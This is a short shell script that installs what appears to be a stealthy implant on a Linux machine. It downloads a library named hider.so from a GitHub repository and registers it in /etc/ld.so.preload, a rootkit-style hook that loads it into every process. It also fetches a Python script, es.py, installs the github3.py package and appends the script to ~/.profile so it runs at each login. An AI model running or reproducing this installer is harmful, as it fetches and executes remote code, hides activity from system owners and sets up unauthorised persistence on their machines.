#!/bin/sh

echo *********************************************
wget https://raw.github.com/mehdi-desu/projet_impossible/master/modules/hider.so
mv hider.so /usr/local/lib

echo /usr/local/lib/hider.so >> /etc/ld.so.preload

echo *********************************************
wget https://raw.github.com/mehdi-desu/projet_impossible/master/es.py
chmod 755 es.py
mv es.py /es.py

echo ********************************************
pip install github3.py

echo *********************************************
echo /es.py >> ~/.profile
